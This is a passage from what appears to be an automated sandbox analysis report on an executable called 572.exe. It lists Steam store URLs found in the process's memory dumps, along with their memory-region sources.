                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/strategy/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/strategy_card_board/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/strategy_cities_settlements/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/strategy_grand_4x/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/strategy_military/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/strategy_real_time/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/strategy_turn_based/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A90000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/survival/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/tower_defense/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/visual_novel/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/charts/mostplayed/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/charts/topselling/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/communityrecommendations/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A90000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/sale/quebec2024?snr=1_4_4__40_2
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/sale/steam_awards?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/sale/vr_specials/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A90000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/search/
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/search/?filter=globaltopsellers&os=win&hidef2p=1&snr=1_4_4__tabsmore
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/search/?filter=globaltopsellers&os=win&snr=1_4_4__tabsmore
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/search/?filter=topsellers&os=win&hidef2p=1&snr=1_4_4__tabsmore
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/search/?filter=topsellers&os=win&snr=1_4_4__tabsmore
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/search/?filter=topsellers&snr=1_4_4__125
                Source: 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464256901.0000000063ABB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/search/?filter=ut1&amp;category1=998&amp;os=&snr=1_4_4_
                Source: 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464256901.0000000063ABB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/search/?filter=ut2&amp;category1=998&amp;os=&snr=1_4_4_
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/search/?specials=1&snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464256901.0000000063ABB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/search/?specials=1&snr=1_4_4__146
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/software/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/soundtracks?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/specials/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A90000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/specials?snr=1_4_4_#tab=TopSellers
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/specials?snr=1_4_4__125#tab=TopSellers
                Source: 572.exe, 00000009.00000003.4070644791.0000000064059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/specials?snr=1_4_4__tabsmore#tab=TopSellers
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/?snr=1_4_4__global-header
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/?snr=1_4_4__global-responsive-menu
                Source: 572.exe, 00000009.00000003.4070644791.0000000064059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/?snr=1_44_44_
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/?snr=1_4_4__global-responsive-menu
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steamdeck/?snr=1_4_4__category-menu
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steamdeckdock/?snr=1_4_4__125
                Source: 572.exe, 00000009.00000003.4070644791.0000000064059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/sub/13435/?snr=1_4_4__tab-Specials
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/sub/199943/?snr=1_4_4__tab-Specials
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/sub/354231/?snr=1_4_4__147
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/sub/376282/?snr=1_4_4__tab-Specials
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/sub/626153/?snr=1_4_4__tab-Specials
                Source: 572.exe, 00000009.00000003.4070644791.0000000064059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/?snr=1_44_44_
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/?snr=1_4_4__global-responsive-menu
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/tag/browse/?snr=1_4_4__125#yours
                Source: 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464256901.0000000063ABB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/tag/browse/?snr=1_4_4__146
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/tags/en/Action/?snr=1_4_4__125
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/tags/en/Adventure/?snr=1_4_4__125
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/tags/en/Casual/?snr=1_4_4__125
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/tags/en/Indie/?snr=1_4_4__125
